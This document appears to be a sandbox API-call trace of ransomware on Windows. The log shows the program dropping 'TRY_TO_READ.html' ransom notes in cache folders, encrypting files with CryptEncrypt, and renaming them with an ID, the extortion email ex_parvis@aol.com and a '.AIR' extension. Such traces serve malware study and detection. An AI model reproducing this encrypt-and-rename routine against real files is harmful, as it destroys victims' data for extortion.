	[0107.201] FindNextFileW (in: hFindFile=0x37b02a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe6bd1e50, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6bd1e50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bd1e50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0107.201] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.201] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.201] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log", dwFileAttributes=0x80) returned 1
	[0107.202] lstrlenW (lpString="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log") returned 63
	[0107.202] GetProcessHeap () returned 0x540000
	[0107.202] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe4) returned 0x56b300
	[0107.203] lstrcpyW (in: lpString1=0x56b300, lpString2="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log" | out: lpString1="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log") returned="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log"
	[0107.203] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.203] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log"), lpNewFileName="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.205] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x56c
	[0107.205] GetProcessHeap () returned 0x540000
	[0107.205] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b300 | out: hHeap=0x540000) returned 1
	[0107.205] GetFileSizeEx (in: hFile=0x56c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=164) returned 1
	[0107.205] SetFilePointer (in: hFile=0x56c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xa4
	[0107.205] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.205] GetProcessHeap () returned 0x540000
	[0107.205] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.205] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.207] WriteFile (in: hFile=0x56c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.208] WriteFile (in: hFile=0x56c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.208] WriteFile (in: hFile=0x56c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.208] ReadFile (in: hFile=0x56c, lpBuffer=0x56b300, nNumberOfBytesToRead=0xa4, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b300*, lpNumberOfBytesRead=0x3a1f778*=0xa4, lpOverlapped=0x0) returned 1
	[0107.208] SetFilePointer (in: hFile=0x56c, lDistanceToMove=-164, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0107.208] WriteFile (in: hFile=0x56c, lpBuffer=0x597e60*, nNumberOfBytesToWrite=0xa4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x597e60*, lpNumberOfBytesWritten=0x3a1f778*=0xa4, lpOverlapped=0x0) returned 1
	[0107.208] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xe6bd1e50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bd1e50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b02e0
	[0107.209] FindNextFileW (in: hFindFile=0x37b02e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xe6bd1e50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bd1e50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.209] FindNextFileW (in: hFindFile=0x37b02e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1
	[0107.209] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x570
	[0107.210] FindNextFileW (in: hFindFile=0x37b02e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6bd1e50, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6bd1e50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bd1e50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.210] FindNextFileW (in: hFindFile=0x37b02e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6bd1e50, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6bd1e50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bd1e50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0107.210] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b0320
	[0107.210] FindNextFileW (in: hFindFile=0x37b0320, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.210] FindNextFileW (in: hFindFile=0x37b0320, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1
	[0107.210] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x574
	[0107.211] FindNextFileW (in: hFindFile=0x37b0320, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6bf7fb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.211] FindNextFileW (in: hFindFile=0x37b0320, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6bf7fb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0107.212] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb49460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b0360
	[0107.212] FindNextFileW (in: hFindFile=0x37b0360, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb49460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.212] FindNextFileW (in: hFindFile=0x37b0360, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1
	[0107.212] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x578
	[0107.214] FindNextFileW (in: hFindFile=0x37b0360, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6bf7fb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.214] FindNextFileW (in: hFindFile=0x37b0360, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6bf7fb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0107.214] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b03a0
	[0107.214] FindNextFileW (in: hFindFile=0x37b03a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.214] FindNextFileW (in: hFindFile=0x37b03a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecd314a0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd314a0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xf08b3aa0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x28e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="state.rsm", cAlternateFileName="")) returned 1
	[0107.214] FindNextFileW (in: hFindFile=0x37b03a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6bf7fb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6bf7fb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6bf7fb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.214] FindNextFileW (in: hFindFile=0x37b03a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd0b340, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd3ea4f80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x6f428, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1
	[0107.214] FindNextFileW (in: hFindFile=0x37b03a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd0b340, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd3ea4f80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x6f428, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0
	[0107.214] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.214] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.214] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe", dwFileAttributes=0x80) returned 1
	[0107.215] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned 89
	[0107.215] GetProcessHeap () returned 0x540000
	[0107.215] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x118) returned 0x57fb28
	[0107.215] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe"
	[0107.215] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.215] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.218] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x57c
	[0107.218] GetProcessHeap () returned 0x540000
	[0107.218] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0107.218] GetFileSizeEx (in: hFile=0x57c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=455720) returned 1
	[0107.218] SetFilePointer (in: hFile=0x57c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x6f428
	[0107.218] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.218] GetProcessHeap () returned 0x540000
	[0107.218] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.218] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.218] WriteFile (in: hFile=0x57c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.220] WriteFile (in: hFile=0x57c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.220] WriteFile (in: hFile=0x57c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.223] ReadFile (in: hFile=0x57c, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x6f428, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x6f428, lpOverlapped=0x0) returned 1
	[0107.238] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.238] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.238] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm", dwFileAttributes=0x80) returned 1
	[0107.239] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned 82
	[0107.239] GetProcessHeap () returned 0x540000
	[0107.239] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10a) returned 0x57fb28
	[0107.239] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"
	[0107.239] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR"
